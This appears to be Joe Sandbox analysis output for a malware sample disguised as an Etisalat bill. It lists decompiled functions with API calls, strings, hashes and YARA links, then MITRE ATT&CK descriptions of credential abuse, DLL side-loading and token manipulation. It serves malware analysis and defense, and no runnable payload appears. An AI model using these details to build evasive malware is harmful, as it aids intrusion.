Opcode ID: 49cbefd1398c3efd2720494e999698b6a55cbe16ad15c1f6d6cb617761fede03
Instruction ID: b78255602c9139348874e05eac2919c6f128e8417f1e926b3d6b92508dfa3caf
Opcode Fuzzy Hash: 49cbefd1398c3efd2720494e999698b6a55cbe16ad15c1f6d6cb617761fede03
Instruction Fuzzy Hash: 2B319E71110604AEDB109F68DC82FFB73ADFF88724F009619F8A9D7290DA34AD91DB60

Function 00934537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0093461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00934634

Strings

', xrefs: 0093458E

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f98bbcea383669641a2062378ca14ca28ef03f869fcb20b9499f48dc55650ad3
Instruction ID: 5076625689e7088e00a265647d5e43607026b8b128e6b57c9e6fff36720673a7
Opcode Fuzzy Hash: f98bbcea383669641a2062378ca14ca28ef03f869fcb20b9499f48dc55650ad3
Instruction Fuzzy Hash: 7D312575A0030A9FDB14CFA9C981BDABBB9FF09304F11406AE904AB381D770A941CF90

Function 009331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0093327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00933287

Strings

Combobox, xrefs: 00933249

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 97bf060b60fe331f4a5aed6a0ec766babef0966d6e18031e9261337be18af037
Instruction ID: 46394975ef7a4c45f04009d1283c3a04c6674e80112bd03a60c5a6e379ccdbee
Opcode Fuzzy Hash: 97bf060b60fe331f4a5aed6a0ec766babef0966d6e18031e9261337be18af037
Instruction Fuzzy Hash: 1911B2713442087FFF219E94DC81EBB376FEB94364F108228F928A7290D6719D619B60

Function 00933710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 008A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008A604C
Part of subcall function 008A600E: GetStockObject.GDI32(00000011), ref: 008A6060
Part of subcall function 008A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 008A606A

GetWindowRect.USER32(00000000,?), ref: 0093377A
GetSysColor.USER32(00000012), ref: 00933794

Strings

static, xrefs: 00933757

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: cda1ffa0c4a255187afa9af9c5bdb8d1989775ebf29c9179a9cabad4b644ec03
Instruction ID: f44105a1078fa3615a8e9e47b3596ea46066fcda9ed5f342a56914f3c0b0c0a4
Opcode Fuzzy Hash: cda1ffa0c4a255187afa9af9c5bdb8d1989775ebf29c9179a9cabad4b644ec03
Instruction Fuzzy Hash: B01129B2654609AFDF00DFA8CC46AEA7BF8FB08314F004914F956E2250E735E8619B50

Function 0091CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0091CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0091CDA6

Strings

<local>, xrefs: 0091CD66

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1ed8ad703ff236353010a6058f488740babb6b040362f12232f9562d2abaeceb
Instruction ID: 0bb294f8946951fc1f56020068640a5c1d2fb353577bf049dac693c20190dbd1
Opcode Fuzzy Hash: 1ed8ad703ff236353010a6058f488740babb6b040362f12232f9562d2abaeceb
Instruction Fuzzy Hash: 0A1106F93856397AD7344B669C44EE7BEADEF127A4F004226B109930C0D3749880D6F0

Function 00933429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 009334AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009334BA

Strings

edit, xrefs: 0093348F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 1c50a7c67fda0fb1853b3197bb74a760765f6f983e4fc8a40cbf20d997f29e54
Instruction ID: 2f8b3956dd451d2018cd540e0e844aa6af0af87f900d1f9090f4579917f7b021
Opcode Fuzzy Hash: 1c50a7c67fda0fb1853b3197bb74a760765f6f983e4fc8a40cbf20d997f29e54
Instruction Fuzzy Hash: 98118F71150208ABEB114F64DC48AEB376EEB45378F508724F965A31E0C775DC919F51

Function 00906C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

CharUpperBuffW.USER32(?,?,?), ref: 00906CB6
_wcslen.LIBCMT ref: 00906CC2

Strings

STOP, xrefs: 00906CBC, 00906CC1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: e6e0a48301cd96f6ab054d2681abec3a3d03803c681fbf5df9449d5caf914db7
Instruction ID: 9ceebe66d2ee91fcee7795c69726a40b4b594620ebfd934621984c280d0c2028
Opcode Fuzzy Hash: e6e0a48301cd96f6ab054d2681abec3a3d03803c681fbf5df9449d5caf914db7
Instruction Fuzzy Hash: 3B0104326045368FEB209FBDDC809BF37B8FB61710B000928E992D61D0EB31D960C650

Function 00901CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 00903CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00903CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00901D4C

Strings

ComboBox, xrefs: 00901CEB
ListBox, xrefs: 00901D16

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 80c20d30a0c12320ed25b06eedeb07a384ef0588f6a3eb8bb6c3ac44ffdbbd97
Instruction ID: 77897a90b8617c976dcd0a9c9303bd16be497c7744f701cf83ae73eb00b5e9c7
Opcode Fuzzy Hash: 80c20d30a0c12320ed25b06eedeb07a384ef0588f6a3eb8bb6c3ac44ffdbbd97
Instruction Fuzzy Hash: C801D871605624AFDB08EBA4CC51DFE736CFF47754B040919F862A72C1EA3459088761

Function 00901BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 00903CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00903CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00901C46

Strings

ComboBox, xrefs: 00901BE5
ListBox, xrefs: 00901C10

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: dd2b4ec0d035448198f55178cf2529c5caaa442d74949478ddd72b1c6f798664
Instruction ID: 5b17854c90011b4594b3bf87bb8f8d8fb4f132c1311ca8863a169a9b91746104
Opcode Fuzzy Hash: dd2b4ec0d035448198f55178cf2529c5caaa442d74949478ddd72b1c6f798664
Instruction Fuzzy Hash: 7401AC756451146FEB08E7A4C952AFF77ACDB52340F140015F886B71C1EA24DF48D672

Function 00901C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008A9CB3: _wcslen.LIBCMT ref: 008A9CBD

Part of subcall function 00903CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00903CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00901CC8

Strings

ComboBox, xrefs: 00901C69
ListBox, xrefs: 00901C94

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 9b5ab8de436f97376688769190a67b96d99cfc925521c01b092208663c899976
Instruction ID: 76df0603c21e564ee72804b0557f3fee56619c58567a69e12d8fa8c54b2574bd
Opcode Fuzzy Hash: 9b5ab8de436f97376688769190a67b96d99cfc925521c01b092208663c899976
Instruction Fuzzy Hash: C601DB716401246BEB04E7A4CA11AFE73ACEB12380F140015F881B32C1EA24DF08D672

Function 0092747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00927493
_wcslen.LIBCMT ref: 009274B9

Strings

3, 3, 16, 1, xrefs: 00927483

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: 79b47d5d5f378c346f7a6dabe6feef1e57de2485973049f68ac4ae2e47b68975
Instruction ID: c6988d3806c9ee3a66bd5c4a1ed8578cb83bbaf8721e42f54044658cfd940802
Opcode Fuzzy Hash: 79b47d5d5f378c346f7a6dabe6feef1e57de2485973049f68ac4ae2e47b68975
Instruction Fuzzy Hash: 0BE0E51260423010923122AABCC1EBF9A9EDEC5750B10282EF981D227EEAA4CDD193A1

Function 00900B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00900B23

Strings

AutoIt, xrefs: 00900B17
Error allocating memory., xrefs: 00900B1C

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 9e10bfe3eb3cf0f96b7a3bf24b82168905d55afed45dfd8a5587e486ba2b1322
Instruction ID: 5c5c29708b5a40ebb67e1ceb8fc61881f286a34b354af3fcd16b312c2d195f10
Opcode Fuzzy Hash: 9e10bfe3eb3cf0f96b7a3bf24b82168905d55afed45dfd8a5587e486ba2b1322
Instruction Fuzzy Hash: CDE020712447183AD21437587C03FC97BC4DF05F65F10042AFB98E55C38BE164900BEA

Function 008C0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 008BF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,008C0D71,?,?,?,008A100A), ref: 008BF7CE

IsDebuggerPresent.KERNEL32(?,?,?,008A100A), ref: 008C0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,008A100A), ref: 008C0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 008C0D7F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 650152f8a5b2b9309a9fbdc7fd0b4c8ec5f46c8de5fcb847d11067176664b842
Instruction ID: e410ab48ce855bdb99cffb74994e6b2ef1e2b7131c5c85762b32413bcf0b6680
Opcode Fuzzy Hash: 650152f8a5b2b9309a9fbdc7fd0b4c8ec5f46c8de5fcb847d11067176664b842
Instruction Fuzzy Hash: 06E06DB02007518BD7309FBCD8047427BF0FB00784F004A6DE996C6651DBB4E4489F91

Function 008FD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 008FD220

Strings

%.3d, xrefs: 008FD22B
X64, xrefs: 008FD2A8

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: cbdb59b31a72b4084501f086e116621be69b618920afb643e1c4a7b20a1b8685
Instruction ID: 4ae411575f28b265853d3c9ba85740ec6eafb0602145b17648941840b0083dde
Opcode Fuzzy Hash: cbdb59b31a72b4084501f086e116621be69b618920afb643e1c4a7b20a1b8685
Instruction Fuzzy Hash: EAD012A180830CE9CB5097F0DC458FAB37DFB08309F508452FB06E1141E634E5086BA2

Function 00932322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0093233F

Part of subcall function 0090E97B: Sleep.KERNEL32 ref: 0090E9F3

Strings

Shell_TrayWnd, xrefs: 00932325

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 9ce6823a5c4cd8732cf66e00f0e32fd920a434326a883a5e1a3a53c314da2d49
Instruction ID: a9da5ddf389402b376fbd38d9f1d1f87392af50b1117115f704144078e8dfa49
Opcode Fuzzy Hash: 9ce6823a5c4cd8732cf66e00f0e32fd920a434326a883a5e1a3a53c314da2d49
Instruction Fuzzy Hash: 4CD012763A8710BBE764B770DC0FFC67A159B40B14F0049167755BA1D0C9F0A841DF54

Function 00932356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0093236C
PostMessageW.USER32(00000000), ref: 00932373

Part of subcall function 0090E97B: Sleep.KERNEL32 ref: 0090E9F3

Strings

Shell_TrayWnd, xrefs: 00932365

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: ee968174cd8f586d6d9cefb3d076c19fa9bee445d3ca1f22653a8b7b714cee7d
Instruction ID: c056e351f977dd5eaa8e8508f433260d8b619884cda8a853d474b6dde63a3c39
Opcode Fuzzy Hash: ee968174cd8f586d6d9cefb3d076c19fa9bee445d3ca1f22653a8b7b714cee7d
Instruction Fuzzy Hash: E4D0C9723997107AE664A7709C0FFC676159B45B14F0049167655BA1D0C9A0A8419B58

Function 008DBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 008DBE93
GetLastError.KERNEL32 ref: 008DBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 008DBEFC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: f2185053aedcfc411159e5aa9712b49662e3f5e74c2d473dc04b8d6b9622b913
Instruction ID: d9f7416d26fa1b128dba90d2ff1547a85647aa86adbe288b9ab265971b79e966
Opcode Fuzzy Hash: f2185053aedcfc411159e5aa9712b49662e3f5e74c2d473dc04b8d6b9622b913
Instruction Fuzzy Hash: D841C335604246EFDB218FA9CC44AAA7BA5FF41320F16426AF959D73A1DF308D00DB61

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
